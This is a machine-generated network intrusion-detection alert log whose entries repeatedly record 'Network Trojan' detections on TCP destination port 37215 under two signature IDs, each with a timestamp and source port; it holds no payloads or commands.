            Timestamp:05/28/24-09:57:17.794181
            SID:2835222
            Source Port:34480
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.996694
            SID:2829579
            Source Port:41230
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:51.604240
            SID:2835222
            Source Port:59978
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.777433
            SID:2835222
            Source Port:40818
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.077869
            SID:2829579
            Source Port:59936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.918913
            SID:2829579
            Source Port:57798
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:46.457603
            SID:2829579
            Source Port:53274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:09.877706
            SID:2835222
            Source Port:50236
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.849633
            SID:2829579
            Source Port:60198
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.342630
            SID:2835222
            Source Port:33780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:57.744389
            SID:2835222
            Source Port:37886
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.230983
            SID:2835222
            Source Port:34988
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871399
            SID:2835222
            Source Port:45500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392533
            SID:2829579
            Source Port:54400
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.586408
            SID:2829579
            Source Port:46948
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.762209
            SID:2835222
            Source Port:42954
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.299214
            SID:2829579
            Source Port:34496
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.440844
            SID:2829579
            Source Port:56754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.744363
            SID:2829579
            Source Port:47428
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:09.698140
            SID:2835222
            Source Port:45950
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.524520
            SID:2829579
            Source Port:54404
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639580
            SID:2829579
            Source Port:60366
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.731725
            SID:2835222
            Source Port:44582
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.820021
            SID:2835222
            Source Port:38040
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.966534
            SID:2829579
            Source Port:33224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.717946
            SID:2835222
            Source Port:60832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.605029
            SID:2835222
            Source Port:45624
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:44.559792
            SID:2835222
            Source Port:39588
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:04.899770
            SID:2829579
            Source Port:54956
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.059764
            SID:2829579
            Source Port:43642
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.880701
            SID:2829579
            Source Port:33558
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.307540
            SID:2835222
            Source Port:34538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.028873
            SID:2829579
            Source Port:41872
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.026789
            SID:2835222
            Source Port:37692
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.882640
            SID:2829579
            Source Port:48148
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.341975
            SID:2835222
            Source Port:56786
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:31.392405
            SID:2835222
            Source Port:38426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.776852
            SID:2835222
            Source Port:38910
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:49.633358
            SID:2835222
            Source Port:47386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.820640
            SID:2835222
            Source Port:34662
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:49.611957
            SID:2829579
            Source Port:57606
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.961276
            SID:2829579
            Source Port:42600
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.919968
            SID:2835222
            Source Port:38680
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:46.622524
            SID:2829579
            Source Port:56322
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:48.519945
            SID:2829579
            Source Port:44218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.741579
            SID:2829579
            Source Port:60762
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.869282
            SID:2829579
            Source Port:44754
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.778080
            SID:2829579
            Source Port:52882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901293
            SID:2829579
            Source Port:51914
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.846980
            SID:2835222
            Source Port:33348
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:42.499822
            SID:2829579
            Source Port:60042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:20.051197
            SID:2829579
            Source Port:58246
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.039354
            SID:2835222
            Source Port:51256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.676107
            SID:2829579
            Source Port:60082
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.861793
            SID:2829579
            Source Port:39808
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832596
            SID:2835222
            Source Port:45882
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:06.878779
            SID:2835222
            Source Port:56780
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.855408
            SID:2835222
            Source Port:34784
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.639614
            SID:2835222
            Source Port:52938
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.788802
            SID:2835222
            Source Port:34274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:48.641515
            SID:2829579
            Source Port:57868
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.952829
            SID:2829579
            Source Port:52688
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:48.559438
            SID:2829579
            Source Port:34512
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.275672
            SID:2829579
            Source Port:44460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.046835
            SID:2829579
            Source Port:57018
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:59.722324
            SID:2835222
            Source Port:53690
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045788
            SID:2829579
            Source Port:33218
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.905994
            SID:2835222
            Source Port:54574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735552
            SID:2835222
            Source Port:51012
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.742324
            SID:2835222
            Source Port:36884
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.721945
            SID:2829579
            Source Port:35288
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.953550
            SID:2835222
            Source Port:53086
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.827850
            SID:2829579
            Source Port:60922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.926644
            SID:2829579
            Source Port:49026
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.300113
            SID:2829579
            Source Port:46734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849393
            SID:2829579
            Source Port:52126
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.371314
            SID:2835222
            Source Port:44270
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:56.720916
            SID:2835222
            Source Port:50116
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.675882
            SID:2829579
            Source Port:60796
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:06.953252
            SID:2829579
            Source Port:60242
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:41.344931
            SID:2829579
            Source Port:40004
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927700
            SID:2829579
            Source Port:34538
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.853686
            SID:2829579
            Source Port:57578
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:22.884470
            SID:2835222
            Source Port:50432
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.780157
            SID:2835222
            Source Port:48556
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:36.262077
            SID:2835222
            Source Port:37250
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.779174
            SID:2835222
            Source Port:35794
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.261509
            SID:2829579
            Source Port:54216
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:58.706681
            SID:2835222
            Source Port:36568
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:10.913300
            SID:2835222
            Source Port:34488
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:45.412838
            SID:2835222
            Source Port:33274
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:47.470487
            SID:2829579
            Source Port:58460
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.533751
            SID:2835222
            Source Port:47284
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.828033
            SID:2835222
            Source Port:49356
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.004964
            SID:2835222
            Source Port:44832
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.057898
            SID:2829579
            Source Port:33468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:24.904857
            SID:2829579
            Source Port:46436
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.038233
            SID:2829579
            Source Port:35392
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.956720
            SID:2829579
            Source Port:51922
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.542360
            SID:2829579
            Source Port:40812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:27.326235
            SID:2835222
            Source Port:56458
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:54.732300
            SID:2829579
            Source Port:46124
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.818832
            SID:2829579
            Source Port:33038
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.058583
            SID:2829579
            Source Port:36506
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.832467
            SID:2829579
            Source Port:44318
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.851274
            SID:2829579
            Source Port:44276
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:14.993616
            SID:2835222
            Source Port:53632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.251094
            SID:2829579
            Source Port:53734
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777612
            SID:2835222
            Source Port:58900
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.862892
            SID:2835222
            Source Port:41426
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.895488
            SID:2835222
            Source Port:53760
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.550534
            SID:2835222
            Source Port:35522
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:21.871091
            SID:2835222
            Source Port:41652
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:13.775878
            SID:2835222
            Source Port:52380
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:26.927643
            SID:2835222
            Source Port:58670
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.670340
            SID:2835222
            Source Port:36664
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.052247
            SID:2829579
            Source Port:46042
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.809324
            SID:2829579
            Source Port:59114
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:53.669860
            SID:2829579
            Source Port:46388
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:47.590675
            SID:2835222
            Source Port:52084
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.855652
            SID:2835222
            Source Port:35256
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:03.893304
            SID:2835222
            Source Port:46336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:15.808367
            SID:2829579
            Source Port:58060
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:33.064052
            SID:2829579
            Source Port:44420
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.804392
            SID:2835222
            Source Port:40616
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777123
            SID:2835222
            Source Port:44476
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:52.645698
            SID:2829579
            Source Port:52672
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.867972
            SID:2835222
            Source Port:37972
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.924458
            SID:2829579
            Source Port:41890
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:17.808739
            SID:2835222
            Source Port:60110
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870921
            SID:2835222
            Source Port:59944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.045385
            SID:2829579
            Source Port:55520
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.921756
            SID:2835222
            Source Port:37370
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.421541
            SID:2829579
            Source Port:51324
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:02.871175
            SID:2829579
            Source Port:56336
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:23.901469
            SID:2835222
            Source Port:42736
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.910120
            SID:2835222
            Source Port:35788
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.870650
            SID:2835222
            Source Port:55814
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.290816
            SID:2835222
            Source Port:46668
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:33.406054
            SID:2829579
            Source Port:48726
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:56.741158
            SID:2835222
            Source Port:56704
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:45.555338
            SID:2829579
            Source Port:53610
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061086
            SID:2835222
            Source Port:40016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.388544
            SID:2835222
            Source Port:51310
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:37.115958
            SID:2829579
            Source Port:32856
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.831662
            SID:2835222
            Source Port:49738
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:55.710083
            SID:2829579
            Source Port:54648
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:55:47.534004
            SID:2835222
            Source Port:46632
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.860658
            SID:2829579
            Source Port:40442
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.061355
            SID:2829579
            Source Port:55266
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.994868
            SID:2835222
            Source Port:53828
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:43.537358
            SID:2835222
            Source Port:38944
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.740446
            SID:2835222
            Source Port:35194
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:05.861899
            SID:2829579
            Source Port:41346
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:39.320118
            SID:2829579
            Source Port:53976
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:04.836517
            SID:2835222
            Source Port:57812
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:05.950289
            SID:2835222
            Source Port:47386
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:20.862658
            SID:2829579
            Source Port:54792
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.015503
            SID:2829579
            Source Port:59054
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:28.995532
            SID:2835222
            Source Port:48160
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:34.060018
            SID:2835222
            Source Port:57166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:11.966672
            SID:2835222
            Source Port:36924
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777697
            SID:2835222
            Source Port:34678
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:43.442391
            SID:2835222
            Source Port:55554
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:44.387759
            SID:2835222
            Source Port:43158
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.047318
            SID:2829579
            Source Port:33416
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848750
            SID:2829579
            Source Port:53936
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:32.065245
            SID:2829579
            Source Port:39368
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.040788
            SID:2829579
            Source Port:49782
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.858314
            SID:2835222
            Source Port:57170
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.814455
            SID:2835222
            Source Port:41224
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:25.939002
            SID:2829579
            Source Port:58574
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:12.921788
            SID:2835222
            Source Port:55902
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:31.025858
            SID:2829579
            Source Port:56248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:38.473947
            SID:2829579
            Source Port:60134
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.970239
            SID:2835222
            Source Port:39500
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.777202
            SID:2835222
            Source Port:45644
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:10.048181
            SID:2835222
            Source Port:57248
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.772739
            SID:2829579
            Source Port:56994
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.777403
            SID:2835222
            Source Port:39418
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:29.005245
            SID:2835222
            Source Port:39660
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.560941
            SID:2835222
            Source Port:42340
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:59.812337
            SID:2835222
            Source Port:51634
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:40.582647
            SID:2835222
            Source Port:51992
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.864771
            SID:2829579
            Source Port:46536
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:18.865510
            SID:2835222
            Source Port:34112
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:14.766850
            SID:2829579
            Source Port:40614
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.849039
            SID:2835222
            Source Port:51686
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:56:58.773106
            SID:2835222
            Source Port:44468
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:00.822167
            SID:2829579
            Source Port:55032
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:11.745761
            SID:2829579
            Source Port:46166
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.967902
            SID:2835222
            Source Port:53050
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:08.735889
            SID:2835222
            Source Port:36372
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:27.963593
            SID:2835222
            Source Port:43016
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:42.376238
            SID:2835222
            Source Port:57186
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:16.848392
            SID:2835222
            Source Port:37020
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:12.756545
            SID:2829579
            Source Port:51530
            Destination Port:37215
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:05/28/24-09:57:35.263279
